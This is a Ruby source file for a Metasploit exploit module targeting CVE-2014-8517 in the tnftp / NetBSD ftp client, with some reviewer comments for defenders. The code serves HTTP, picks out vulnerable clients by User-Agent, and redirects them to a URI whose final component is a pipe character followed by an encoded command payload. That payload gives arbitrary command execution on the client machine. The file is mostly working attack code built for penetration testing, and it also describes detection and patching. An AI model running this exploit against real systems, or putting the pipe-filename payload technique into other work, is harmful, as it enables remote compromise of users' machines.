Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit HTTP-server module for CVE-2014-8517 (tnftp "savefile" handling).
#
# The module serves HTTP and waits for a tnftp / NetBSD ftp(1) client to fetch
# a URL from it. A matching client is redirected to a URI whose final path
# component is "|" followed by the configured payload. Per the Description
# below, tnftp run without -o derives its output filename from that component
# and passes a "|"-prefixed name to popen().
#
# Review notes for defenders:
# * The Description ties the issue to running the client without -o, so an
#   explicit output file (-o) avoids the filename-resolution path; the durable
#   fix is the vendor patch for the CVE listed under 'References'.
# * On the wire this appears as an HTTP redirect whose last path segment
#   percent-decodes to a string starting with "|", followed by a request for
#   that URI from a User-Agent containing "tnftp" or "NetBSD-ftp".
# * report_vuln is written when the redirected request arrives. Nothing in
#   this file confirms that the client actually ran the command.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'tnftp "savefile" Arbitrary Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in
          tnftp's handling of the resolved output filename - called "savefile" in
          the source - from a requested resource.

          If tnftp is executed without the -o command-line option, it will resolve
          the output filename from the last component of the requested resource.

          If the output filename begins with a "|" character, tnftp will pass the
          fetched resource's output to the command directly following the "|"
          character through the use of the popen() function.
        },
        'Author' => [
          'Jared McNeill', # Vulnerability discovery
          'wvu' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-8517'],
          ['URL', 'https://seclists.org/oss-sec/2014/q4/459']
        ],
        'DisclosureDate' => '2014-10-28',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        # "/" is excluded from the payload; presumably because the command has
        # to fit inside a single (last) path component of the URI.
        'Payload' => { 'BadChars' => '/' },
        'Targets' => [['ftp(1)', {}]],
        'DefaultTarget' => 0,
        # NOTE(review): reliability, stability and side effects are still
        # declared as unknown; operators get no guidance from these fields.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Handles one HTTP request received by the HttpServer mixin.
  #
  # Three outcomes, in this order:
  # 1. User-Agent does not match the tnftp / NetBSD-ftp pattern: answer with
  #    a not-found response and stop.
  # 2. Request URI does not yet end with the "|"-prefixed string: redirect the
  #    client to #sploit_uri.
  # 3. Request URI ends with that string: send an empty body, log the event
  #    and record a vulnerability entry for the peer host.
  #
  # @param cli client connection object; used for responses and cli.peerhost
  # @param request HTTP request; read via request['User-Agent'] and request.uri
  def on_request_uri(cli, request)
    agent = request['User-Agent']

    # Unanchored match: any User-Agent containing "tnftp" or "NetBSD-ftp"
    # passes. A missing header (nil) does not match and is rejected here.
    if agent !~ /(tn|NetBSD-)ftp/
      print_status("#{agent} connected")
      send_not_found(cli)
      return
    end

    unless request.uri.ends_with?(sploit)
      print_status("#{agent} connected")
      print_status('Redirecting to exploit...')
      return send_redirect(cli, sploit_uri)
    end

    # The client followed the redirect. The body is empty; per the
    # Description, the filename (not the content) is what reaches popen().
    send_response(cli, '')
    print_good("Executing `#{payload.encoded}'!")
    # Recorded on request arrival only; no confirmation of execution exists here.
    report_vuln(
      host: cli.peerhost,
      name: name,
      refs: references,
      info: agent
    )
  end

  # Builds the redirect target: the module's own URI (with a trailing slash
  # ensured) followed by the "|"-prefixed string passed through
  # Rex::Text.uri_encode in 'hex-all' mode.
  #
  # @return [String] absolute URI the matching client is redirected to
  def sploit_uri
    base = get_uri
    base = "#{base}/" unless base.ends_with?('/')
    base + Rex::Text.uri_encode(sploit, 'hex-all')
  end

  # The final path component served to the client: a "|" followed by the
  # encoded payload command.
  #
  # @return [String]
  def sploit
    "|#{payload.encoded}"
  end
end